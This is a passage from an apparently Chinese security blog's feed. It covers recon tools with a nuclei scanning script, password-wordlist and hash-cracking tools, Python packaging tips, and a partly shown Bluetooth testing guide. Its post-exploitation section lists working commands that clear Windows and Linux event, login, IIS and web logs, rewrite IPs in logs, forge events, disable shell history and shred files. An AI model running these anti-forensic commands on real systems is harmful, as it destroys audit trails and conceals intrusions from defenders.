BugBounty( ͡° ͜ʖ ͡°)… (github.com)</a></p><p><a href="https://github.com/projectdiscovery/nuclei">projectdiscovery/nuclei: Fast and customizable vulnerability scanner based on simple YAML based DSL. (github.com)</a></p><p><a href="https://github.com/sairson/Yasso">sairson/Yasso: 强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,mssql,mysql,winrm等服务爆破,快速的端口扫描,强大的web指纹识别,各种内置服务的一键利用(包括ssh完全交互式登陆,mssql提权,redis一键利用,mysql数据库查询,winrm横向利用,多种服务利用支持socks5代理执行) (github.com)</a></p><p><a href="https://github.com/Adminisme/ServerScan">Adminisme/ServerScan: ServerScan一款使用Golang开发的高并发网络扫描、服务探测工具。 (github.com)</a></p><p><a href="https://github.com/chainreactors/gogo">chainreactors/gogo: 面向红队的, 高度可控可拓展的自动化引擎 (github.com)</a></p><p><a href="https://github.com/chaitin/xray">chaitin/xray: 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档 (github.com)</a></p><p><a href="https://github.com/0xKayala/NucleiFuzzer">0xKayala/NucleiFuzzer: NucleiFuzzer is a Powerful Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc.. Vulnerabilities in Web Applications (github.com)</a></p><h2 id="4-bash脚本进行自动信息收集"><a href="#4-bash脚本进行自动信息收集" class="headerlink" title="4.bash脚本进行自动信息收集"></a>4.bash脚本进行自动信息收集</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#! /bin/bash</span><br><span class="line">amass enum -active -d $1 -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o amass.txt</span><br><span class="line"> </span><br><span class="line">cat amass.txt | aquatone -ports xlarge -out aqua_$1</span><br><span class="line"> </span><br><span class="line">nuclei -l aqua_$1/aquatone_urls.txt -t ~/nuclei-templates -es info -o nuclei_$1.txt</span><br></pre></td></tr></table></figure><h2 id="5-综合平台"><a href="#5-综合平台" class="headerlink" title="5.综合平台"></a>5.综合平台</h2><p><a href="https://github.com/hanc00l/nemo_go">hanc00l/nemo_go: Nemo是用来进行自动化信息收集的一个简单平台,通过集成常用的信息收集工具和技术,实现对内网及互联网资产信息的自动收集,提高隐患排查和渗透测试的工作效率。 (github.com)</a></p><p><a href="https://github.com/TophantTechnology/ARL">TophantTechnology/ARL: ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。 协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。 (github.com)</a></p>]]></content>
<categories>
<category> 攻防 </category>
</categories>
<tags>
<tag> 攻防 </tag>
<tag> 信息收集 </tag>
<tag> 资产测绘 </tag>
</tags>
</entry>
<entry>
<title>密码相关</title>
<link href="/2023/11/18/%E5%AF%86%E7%A0%81%E7%9B%B8%E5%85%B3/"/>
<url>/2023/11/18/%E5%AF%86%E7%A0%81%E7%9B%B8%E5%85%B3/</url>
<content type="html"><![CDATA[<h1 id="密码相关"><a href="#密码相关" class="headerlink" title="密码相关"></a>密码相关</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>在渗透测试过程中会需要构建字典或者破解对应密码,在此收集相关工具</p><h2 id="2-密码字典构建"><a href="#2-密码字典构建" class="headerlink" title="2.密码字典构建"></a>2.密码字典构建</h2><p>密码字典通过公开字典集合进行收集和根据前期信息收集情况进行生成</p><h4 id="公开字典集合"><a href="#公开字典集合" class="headerlink" title="公开字典集合"></a>公开字典集合</h4><ul><li>综合字典</li></ul><p><a href="https://github.com/TheKingOfDuck/fuzzDicts">TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。 (github.com)</a></p><p><a href="https://github.com/insightglacier/Dictionary-Of-Pentesting">insightglacier/Dictionary-Of-Pentesting: Dictionary collection project such as Pentesing, Fuzzing, Bruteforce and BugBounty. 渗透测试、SRC漏洞挖掘、爆破、Fuzzing等字典收集项目。 (github.com)</a></p><p><a href="https://github.com/a3vilc0de/PentesterSpecialDict">a3vilc0de/PentesterSpecialDict: Dictionary for penetration testers happy hacker (github.com)</a></p><p><a href="https://github.com/danielmiessler/SecLists">danielmiessler/SecLists: SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. (github.com)</a></p><ul><li>密码字典</li></ul><p><a href="https://github.com/ohmybahgosh/RockYou2021.txt">ohmybahgosh/RockYou2021.txt: RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists. RockYou2021.txt DOES NOT CONTAIN USER:PASS logins! (github.com)</a></p><p><a href="https://github.com/k8gege/PasswordDic">k8gege/PasswordDic: 2011-2019年Top100弱口令密码字典 Top1000密码字典 服务器SSH/VPS密码字典 后台管理密码字典 数据库密码字典 子域名字典 (github.com)</a></p><p><a href="https://github.com/rootphantomer/Blasting_dictionary">rootphantomer/Blasting_dictionary: 爆破字典 (github.com)</a></p><h4 id="字典生成工具"><a href="#字典生成工具" class="headerlink" title="字典生成工具"></a>字典生成工具</h4><p><a href="https://github.com/LandGrey/pydictor">LandGrey/pydictor: A powerful and useful hacker dictionary builder for a brute-force attack (github.com)</a></p><p><a href="https://github.com/zgjx6/SocialEngineeringDictionaryGenerator">zgjx6/SocialEngineeringDictionaryGenerator: 社会工程学密码生成器,是一个利用个人信息生成密码的工具 (github.com)</a></p><p><a href="https://github.com/achuna33/weak_password">achuna33/weak_password: 可通过姓名、身份证、QQ号、手机号、生日信息、域名、邮箱,生成弱口令字典 (github.com)</a></p><h2 id="3-密码破解"><a href="#3-密码破解" class="headerlink" title="3.密码破解"></a>3.密码破解</h2><p>有时候需要对密码hash进行破解以获取明文</p><p>分布式hashcat</p><p><a href="https://github.com/hashtopolis/server">hashtopolis/server: Hashtopolis - 用于分布式密码恢复的 Hashcat 包装器 (github.com)</a></p><p>离线破解+在线接口(非常好用,避免多个网页进行查询MD5)</p><p><a href="https://github.com/L-codes/pwcrack-framework">L-codes/pwcrack-framework: Password Crack Framework (github.com)</a></p><p>john</p><p><a href="https://github.com/openwall/john">openwall/john: John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs (github.com)</a></p><p>hashcat</p><p><a href="https://github.com/hashcat/hashcat">hashcat/hashcat: World’s fastest and most advanced password recovery utility (github.com)</a></p><h4 id="常用软件密码破解"><a href="#常用软件密码破解" class="headerlink" title="常用软件密码破解"></a>常用软件密码破解</h4><ul><li>浏览器、QQ等</li></ul><p><a href="https://github.com/moonD4rk/HackBrowserData">moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. 一款可全平台运行的浏览器数据导出解密工具。 (github.com)</a></p><ul><li>xshell</li></ul><p><a href="https://github.com/JDArmy/SharpXDecrypt">JDArmy/SharpXDecrypt: Xshell全版本密码恢复工具 (github.com)</a></p>]]></content>
<categories>
<category> 工具 </category>
</categories>
<tags>
<tag> 密码 </tag>
<tag> 暴力破解 </tag>
<tag> 密码喷洒 </tag>
</tags>
</entry>
<entry>
<title>Python 一些技巧</title>
<link href="/2023/11/14/python%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7/"/>
<url>/2023/11/14/python%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7/</url>
<content type="html"><![CDATA[<h1 id="Python-一些技巧"><a href="#Python-一些技巧" class="headerlink" title="Python 一些技巧"></a>Python 一些技巧</h1><h2 id="打包文件"><a href="#打包文件" class="headerlink" title="打包文件"></a>打包文件</h2><p>用于可以生成不依赖python环境的exe</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#静态打包且无黑框</span><br><span class="line">pyinstaller --onefile --noconsole your_script_name.py</span><br><span class="line"></span><br><span class="line">#静态打包有黑框</span><br><span class="line">pyinstaller --onefile</span><br></pre></td></tr></table></figure><h2 id="生成requirement"><a href="#生成requirement" class="headerlink" title="生成requirement"></a>生成requirement</h2><p>方便别人部署自己编写的项目</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip install pipreqs</span><br><span class="line">pipreqs . --encoding=utf8 --force</span><br></pre></td></tr></table></figure><h2 id="包管理"><a href="#包管理" class="headerlink" title="包管理"></a>包管理</h2><p>避免多个python组件互相冲突</p><h3 id="安装venv"><a href="#安装venv" class="headerlink" title="安装venv"></a>安装venv</h3><p>linux</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install python3-venv</span><br></pre></td></tr></table></figure><p>windows直接就有</p><h3 id="创建虚拟环境"><a href="#创建虚拟环境" class="headerlink" title="创建虚拟环境"></a>创建虚拟环境</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m venv test_env</span><br></pre></td></tr></table></figure><h4 id="linux激活"><a href="#linux激活" class="headerlink" title="linux激活"></a>linux激活</h4><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">source ./test_env/bin/activate</span><br></pre></td></tr></table></figure><h4 id="windows激活"><a href="#windows激活" class="headerlink" title="windows激活"></a>windows激活</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\test_env\Scripts\Activate.ps1</span><br></pre></td></tr></table></figure><p>在虚拟环境下安装包会直接将包放在当前目录,不会对其他环境造成影响</p>]]></content>
<categories>
<category> 工具 </category>
</categories>
<tags>
<tag> 开发 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title>后渗透-清理痕迹</title>
<link href="/2023/10/26/%E5%90%8E%E6%B8%97%E9%80%8F-%E6%B8%85%E7%90%86%E7%97%95%E8%BF%B9/"/>
<url>/2023/10/26/%E5%90%8E%E6%B8%97%E9%80%8F-%E6%B8%85%E7%90%86%E7%97%95%E8%BF%B9/</url>
<content type="html"><![CDATA[<h1 id="后渗透-清理痕迹"><a href="#后渗透-清理痕迹" class="headerlink" title="后渗透-清理痕迹"></a>后渗透-清理痕迹</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>在进行各类攻防项目时需要好好的保护自己。整理windows和linux痕迹清理方法。</p><h2 id="2-windows痕迹清理"><a href="#2-windows痕迹清理" class="headerlink" title="2.windows痕迹清理"></a>2.windows痕迹清理</h2><h3 id="使用msf清理"><a href="#使用msf清理" class="headerlink" title="使用msf清理"></a>使用msf清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter> run event_manager -c</span><br></pre></td></tr></table></figure><h3 id="有远程权限清理的手动清理路径"><a href="#有远程权限清理的手动清理路径" class="headerlink" title="有远程权限清理的手动清理路径"></a>有远程权限清理的手动清理路径</h3><p>开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志</p><h3 id="使用wevtutil清理"><a href="#使用wevtutil清理" class="headerlink" title="使用wevtutil清理"></a>使用wevtutil清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wevtutil el 列出系统中所有日志名称</span><br><span class="line">wevtutil cl system 清理系统日志</span><br><span class="line">wevtutil cl application 清理应用程序日志</span><br><span class="line">wevtutil cl security 清理安全日志</span><br></pre></td></tr></table></figure><h3 id="用powershell全清理"><a href="#用powershell全清理" class="headerlink" title="用powershell全清理"></a>用powershell全清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}" & Powershell -Command "Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}"</span><br></pre></td></tr></table></figure><h3 id="清理iis"><a href="#清理iis" class="headerlink" title="清理iis"></a>清理iis</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">1.停止服务:</span><br><span class="line">net stop w3svc</span><br><span class="line">2.删除日志目录下所有文件:</span><br><span class="line">del *.*</span><br><span class="line">3.重新启用服务:</span><br><span class="line">net start w3svc</span><br><span class="line"></span><br><span class="line">IIS日志存放地址:</span><br><span class="line">Windows Server 2003 iis 6日志路径:</span><br><span class="line">C:\Windows\System32\LogFiles</span><br><span class="line">Windows Server 2008 R2、2012、2016、2019 iis7以上日志路径:</span><br><span class="line">C:\inetpub\logs\LogFiles</span><br><span class="line"></span><br><span class="line">由于每个网站,iis 都会自动生成一个保存日志的文件夹,所以具体 iis日志位置在 LogFiles 文件夹中的一个子文件夹里,例如:</span><br><span class="line">C:\Windows\System32\LogFiles\W3SVC2</span><br><span class="line">C:\inetpub\logs\LogFiles\W3SVC1</span><br></pre></td></tr></table></figure><h3 id="rdp记录清理"><a href="#rdp记录清理" class="headerlink" title="rdp记录清理"></a>rdp记录清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server ClientDefault" /va /f&reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f&reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"&del /ah %homepath%\documents\default.rdp</span><br></pre></td></tr></table></figure><h3 id="windows文件安全删除"><a href="#windows文件安全删除" class="headerlink" title="windows文件安全删除"></a>windows文件安全删除</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.Cipher 命令多次覆写:</span><br><span class="line">cipher /w:D:\文件名</span><br><span class="line">2.Format命令覆盖格式化:</span><br><span class="line">format D: /P:8</span><br><span class="line"></span><br><span class="line">Tips:</span><br><span class="line">1.在删除文件后,可以利用Cipher 命令通过 /W 参数可反复写入其他数据覆盖已删除文件的硬盘空间,彻底删除数据防止被恢复.</span><br><span class="line">2.Format 命令加上 /P 参数后,就会把每个扇区先清零,再用随机数覆盖.而且可以覆盖多次,上述这条命令表示把 D 盘用随机数覆盖 8 次.</span><br></pre></td></tr></table></figure><h3 id="替换日志"><a href="#替换日志" class="headerlink" title="替换日志"></a>替换日志</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.利用脚本停止日志的记录:</span><br><span class="line">https://github.com/hlldz/Invoke-Phant0m</span><br><span class="line"></span><br><span class="line">2.Windows 单条日志清除:</span><br><span class="line">https://github.com/QAX-A-Team/EventCleaner</span><br><span class="line"></span><br><span class="line">3.Windows日志伪造:</span><br><span class="line">eventcreate -l system -so administrator -t warning -d "this is a test" -id 500</span><br></pre></td></tr></table></figure><h2 id="3-linux痕迹清理"><a href="#3-linux痕迹清理" class="headerlink" title="3.linux痕迹清理"></a>3.linux痕迹清理</h2><p>首先针对.bash开头的文件进行处理如<code>.bash_history</code>或<code>.bash_logout</code></p><p>在当前shell中直接输入命令<code>HISTSIZE=0 && HISTFILESIZE=0</code>,这样会将缓存的history记录和<del>/.bash_history中的记录全部清空;如果在</del>/.bashrc初始化文件中添加命令:<code>HISTSIZE=0 && HISTFILESIZE=0</code>,这样每次开启shell都不会再记录history命令。</p><h3 id="本次不记录任何信息"><a href="#本次不记录任何信息" class="headerlink" title="本次不记录任何信息"></a>本次不记录任何信息</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0</span><br></pre></td></tr></table></figure><h3 id="清除history"><a href="#清除history" class="headerlink" title="清除history"></a>清除history</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">vim ~/.bash_history</span><br><span class="line">删除不想要的部分,dd删除一整行</span><br><span class="line">Esc,输入:wq,回车</span><br><span class="line"></span><br><span class="line">清理当前用户的history</span><br><span class="line">history -c</span><br></pre></td></tr></table></figure><h3 id="linux日志全清理"><a href="#linux日志全清理" class="headerlink" title="linux日志全清理"></a>linux日志全清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok</span><br><span class="line">1.清除登录系统失败的记录:</span><br><span class="line">echo > /var/log/btmp</span><br><span class="line"></span><br><span class="line">2.清除登录系统成功的记录:</span><br><span class="line">echo > /var/log/wtmp</span><br><span class="line"></span><br><span class="line">3.清除用户最后一次登录时间:</span><br><span class="line">echo > /var/log/lastlog</span><br><span class="line"></span><br><span class="line">4.清除当前登录用户的信息:</span><br><span class="line">echo > /var/log/utmp</span><br><span class="line"></span><br><span class="line">5.清除安全日志记录:</span><br><span class="line">cat /dev/null > /var/log/secure</span><br><span class="line"></span><br><span class="line">6.清除系统日志记录:</span><br><span class="line">cat /dev/null > /var/log/message</span><br></pre></td></tr></table></figure><h3 id="替换"><a href="#替换" class="headerlink" title="替换"></a>替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip:</span><br><span class="line">sed -i '/10.10.10.10/'d /var/log/messages</span><br><span class="line"></span><br><span class="line">全局替换登录IP地址:</span><br><span class="line">sed -i 's/10.10.10.10/192.168.1.1/g' secure</span><br></pre></td></tr></table></figure><h3 id="linux-web日志清理"><a href="#linux-web日志清理" class="headerlink" title="linux web日志清理"></a>linux web日志清理</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">直接替换日志ip地址:</span><br><span class="line">sed -i 's/10.10.10.10/192.168.1.1/g' access.log</span><br><span class="line"></span><br><span class="line">清除部分相关日志:</span><br><span class="line">使用grep -v来把相关信息删除:</span><br><span class="line">cat /var/log/nginx/access.log | grep -v evil.php > tmp.log</span><br><span class="line"></span><br><span class="line">把修改过的日志覆盖到原日志文件:</span><br><span class="line">cat tmp.log > /var/log/nginx/access.log/</span><br></pre></td></tr></table></figure><h3 id="linux-隐身登录ssh-(不被w-who-last命令检测)"><a href="#linux-隐身登录ssh-(不被w-who-last命令检测)" class="headerlink" title="linux 隐身登录ssh (不被w who last命令检测)"></a>linux 隐身登录ssh (不被w who last命令检测)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -T root@10.10.10.10 /bin/bash -i</span><br></pre></td></tr></table></figure><h3 id="不记录ssh公钥"><a href="#不记录ssh公钥" class="headerlink" title="不记录ssh公钥"></a>不记录ssh公钥</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -o UserKnownHostsFile=/dev/null -T root@10.10.10.10 /bin/bash -i</span><br></pre></td></tr></table></figure><h3 id="文件安全删除"><a href="#文件安全删除" class="headerlink" title="文件安全删除"></a>文件安全删除</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">shred命令擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数:</span><br><span class="line">shred -f -u -z -v -n 8 <要删除的文件></span><br><span class="line"></span><br><span class="line">dd命令:</span><br><span class="line">dd if=/dev/zero of=<要删除的文件> bs=<大小> count=<写入的次数></span><br><span class="line"></span><br><span class="line">wipe命令:</span><br><span class="line">wipe <要删除的文件></span><br></pre></td></tr></table></figure><h2 id="4-参考链接"><a href="#4-参考链接" class="headerlink" title="4.参考链接"></a>4.参考链接</h2><p>[Wiping logs from target with clearev command - Metasploit Revealed: Secrets of the Expert Pentester <a href="https://www.oreilly.com/library/view/metasploit-revealed-secrets/9781788624596/fd3960e0-0d84-47e4-9bda-d9efa87a5bd8.xhtml">Book] (oreilly.com)</a></p><p><a href="https://websec.readthedocs.io/zh/latest/intranet/windows/trace.html">6.1.4. 痕迹清理 — Web安全学习笔记 1.0 文档 (websec.readthedocs.io)</a></p><p><a href="https://websec.readthedocs.io/zh/latest/intranet/linux/trace.html">6.2.3. 痕迹清理 — Web安全学习笔记 1.0 文档 (websec.readthedocs.io)</a></p><p><a href="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448905971&idx=1&sn=583df1dcc8e899a48402125998f14e7a&chksm=8b55c6aebc224fb8941b0eb02bcc8fa7e9c293ed6ea15ae2f6bd234e4b539d9570d75ea5132e&cur_album_id=2726754431161352194&scene=189#wechat_redirect">Windows 入侵痕迹清理技巧 (qq.com)</a></p><p><a href="https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448905988&idx=1&sn=224748ca695f1aa67041a2752258c357&chksm=8b55c759bc224e4f43e6db51e801745bed2209946a2af89b15da1daae95cfc98c3819658d843&cur_album_id=2726754431161352194&scene=189#wechat_redirect">Linux 入侵痕迹清理技巧 (qq.com)</a></p>]]></content>
<categories>
<category> 攻防 </category>
</categories>
<tags>
<tag> 清理痕迹 </tag>
<tag> 渗透 </tag>
<tag> 攻防 </tag>
</tags>
</entry>
<entry>
<title>蓝牙工具</title>
<link href="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/"/>
<url>/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/</url>
<content type="html"><![CDATA[<h1 id="蓝牙工具"><a href="#蓝牙工具" class="headerlink" title="蓝牙工具"></a>蓝牙工具</h1><h2 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a>1.简介</h2><p>应对工控以及车联网测试需求,研究蓝牙工具以及测试方法。</p><h2 id="2-工具清单"><a href="#2-工具清单" class="headerlink" title="2.工具清单"></a>2.工具清单</h2><ul><li>hciconfig</li><li>hcitool</li><li>l2ping</li><li>sdptool </li><li>blueranger </li><li>bluetoothctl</li><li>gatttool</li><li>Bettercap</li><li>wireshark</li></ul><h3 id="2-1前期准备"><a href="#2-1前期准备" class="headerlink" title="2.1前期准备"></a>2.1前期准备</h3><ul><li>物理机kali(或者免驱USB蓝牙)</li><li>测试目标蓝牙设备(测试经典蓝牙可用蓝牙耳机、手机等,测试BLE需要使用物联网设备如蓝牙插座、BLE车机等)</li></ul><p>在kali中打开蓝牙服务</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134631198.png" alt="image-20231022134631198"></p><h3 id="2-2-hciconfig"><a href="#2-2-hciconfig" class="headerlink" title="2.2 hciconfig"></a>2.2 hciconfig</h3><p>hciconfig命令,用于展示本地蓝牙设备的详细信息,比如BD Address等。</p><p>1.使用<code>hciconfig</code>命令查看蓝牙是否正常识别,正常情况如下图所示:</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134509384.png" alt="image-20231022134509384"></p><p>如果使用虚拟机kali配合免驱USB蓝牙,会发现多出<code>hci1</code>设备。</p><p>2.若蓝牙设备未启用,则需要进行启用</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hciconfig hci0 up </span><br></pre></td></tr></table></figure><h3 id="2-3-hcitool"><a href="#2-3-hcitool" class="headerlink" title="2.3 hcitool"></a>2.3 hcitool</h3><p>hcitool命令,测试命令的合集,比如扫描周边的蓝牙设备</p><p>1.扫描周围开启发现模式的蓝牙设备</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hcitool scan </span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134206231.png" alt="image-20231022134206231"></p><p>2.如果scan过程中发现目标设备,可以使用使用如下命令进一步调查的设备</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hcitool inq </span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134331617.png" alt="image-20231022134331617"></p><h3 id="2-3-l2ping"><a href="#2-3-l2ping" class="headerlink" title="2.3 l2ping"></a>2.3 l2ping</h3><p>l2ping命令,L2CAP ping Logical <strong>Link Control and AdaptationProtocol,即逻辑链路控制和适配协议</strong></p><p>使用<code>l2ping</code>可以对目标设备进行存活确认</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134425470.png" alt="image-20231022134425470"></p><h3 id="2-4-sdptool"><a href="#2-4-sdptool" class="headerlink" title="2.4 sdptool"></a>2.4 sdptool</h3><p>sdptool命令,<strong>Bluetooth Service Discovery Protocol</strong></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134849415.png" alt="image-20231022134849415"></p><h3 id="2-5-blueranger"><a href="#2-5-blueranger" class="headerlink" title="2.5 blueranger"></a>2.5 blueranger</h3><p>强制连接目标设备</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022141310012.png" alt="image-20231022141310012"></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022141352227.png" alt="image-20231022141352227"></p><h3 id="2-6-bluetoothctl"><a href="#2-6-bluetoothctl" class="headerlink" title="2.6 bluetoothctl"></a>2.6 bluetoothctl</h3><p>Bluetoothctl是用于控制蓝牙设备的交互式且易于使用的工具。它是在基于Linux的操作系统上管理蓝牙的主要实用程序。实质上是由bluez源码下的client目录的相关文件编译生成的可执行程序(命令)。bluetoothctl 主要是bluez官方提供的一个命令行交互的一个客户端,用于和bluetoothd的通信进行BLE广播包的设置、BLE相关配置、创建服务、特征等</p><h4 id="查看controller"><a href="#查看controller" class="headerlink" title="查看controller"></a>查看controller</h4><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152257808.png" alt="image-20231022152257808"></p><h4 id="查看controller的属性"><a href="#查看controller的属性" class="headerlink" title="查看controller的属性"></a>查看controller的属性</h4><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152353358.png" alt="image-20231022152353358"></p><h4 id="扫描周边设备"><a href="#扫描周边设备" class="headerlink" title="扫描周边设备"></a>扫描周边设备</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scan on</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152603937.png" alt="image-20231022152603937"></p><h4 id="设备配对"><a href="#设备配对" class="headerlink" title="设备配对"></a>设备配对</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pair MAC</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152905210.png" alt="image-20231022152905210"></p><h3 id="2-7-gatttool"><a href="#2-7-gatttool" class="headerlink" title="2.7 gatttool"></a>2.7 